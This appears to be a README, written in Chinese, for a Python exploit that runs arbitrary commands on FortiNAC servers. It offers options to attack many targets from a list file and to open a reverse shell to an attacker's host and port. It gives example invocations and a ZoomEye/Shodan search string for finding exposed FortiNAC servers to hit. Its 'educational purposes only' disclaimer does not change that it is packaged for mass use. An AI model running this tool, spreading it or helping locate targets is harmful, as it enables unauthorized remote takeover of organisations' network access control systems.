该漏洞利用程序允许攻击者在 FortiNAC 服务器上执行任意命令。它基于 horizon3ai 开发的 PoC,并增加了针对多个目标进行攻击的选项。
免责声明:此漏洞利用程序仅供教育目的使用。请负责任地使用,并确保获得授权。
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]
options:
-h, --help 显示此帮助信息并退出
-t TARGET, --target TARGET
目标 IP 地址
-l LIST, --list LIST 目标列表文件
-lh LHOST, --lhost LHOST
用于反弹 shell 的本地主机
-lp LPORT, --lport LPORT
用于反弹 shell 的本地端口
要使用此漏洞利用程序,您的系统必须安装 Python 3.x。
Python 3.x
requests 模块
concurrent.futures 模块
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444
$ python exploit.py -t 192.168.1.100
$ python exploit.py -l targets.txt
此漏洞利用程序仅在有限数量的目标上进行了测试,因此其效果可能有所不同。在 ZoomEye 和 Shodan 上查找潜在目标的搜索语法为:
title:"FortiNAC" +"JSESSIONID"